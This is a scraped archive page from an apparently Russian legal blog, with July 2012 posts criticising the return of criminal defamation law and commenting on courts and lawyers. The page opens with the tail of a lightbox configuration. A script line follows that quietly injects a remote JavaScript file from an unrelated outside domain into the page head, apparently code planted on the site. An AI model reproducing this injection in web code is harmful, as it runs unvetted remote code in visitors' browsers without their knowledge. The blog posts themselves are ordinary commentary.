, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Архив за июля, 2012

Такое законотворчество не может способствовать правосудию

30 Июл

Сегодня самый  мрачный день для тысяч тех, кто поддерживал В.В. Путина и желал ему искренне помочь.

Подписание закона о возврате в УК клеветы, прямо свидетельствует о том, что  Президент России в данном вопросе не желает слушать специалистов и  не всегда прислушивается к мнению тех, кто знает систему действующего законодательства.
Читать полностью »

 

Адвокаты и правосудие

24 Июл

Более двух месяцев работает блог «За Правосудие», и за все это время никто из адвокатов не оставил свои комментарии. Почему? У них все  в порядке с правосудием? Тогда почему в конторах и коллегиях только и слышно, что тот или иной судья действовал неправомерно?
Читать полностью »

 

В стране нет более важных проблем, чем криминализация «клеветы»?

11 Июл

На этой неделе в СМИ самый обсуждаемый вопрос — о криминализации ответственности за клевету. Но никто так и не пояснил народу, зачем надо вернуть в Уголовный кодекс РФ «Клевету»?

Клевета это распространение заведомо ложных сведений. Но за это уже есть в УК уголовная ответственность. Так, за заведомо ложное сообщение о совершении преступления предусмотрена уголовная ответственность до 6 (шести) лет лишения свободы (ст. 306 УК РФ). Знают ли об этом инициаторы возврата «Клеветы» и депутаты, голосовавшие за возврат этой статьи? Почему никто не объяснил народу, в силу каких обстоятельств «Клевета» стала вновь общественно опасным деянием, за которое должна быть только уголовная ответственность? Даже обывателю ясно, что сообщение о совершении гражданином преступления является более общественно опасным, чем сообщение порочащее честь, достоинство и репутацию гражданина.
Читать полностью »

 
 

Почему деятели культуры написали письмо в защиту девушек на имя глав Верховного Суда и Мосгорсуда?

02 Июл

Согласно Конституции РФ (ст. 83) состав исполнителей судебной власти формирует Президент России. Именно Президент России (Д.В. Медведев или В.В. Путин)  позволили надеть мантии судьям, принявшим решение о такой мере пресечения, как содержание под стражей, для «девушек» пожелавших в Храме устроить шоу.
Читать полностью »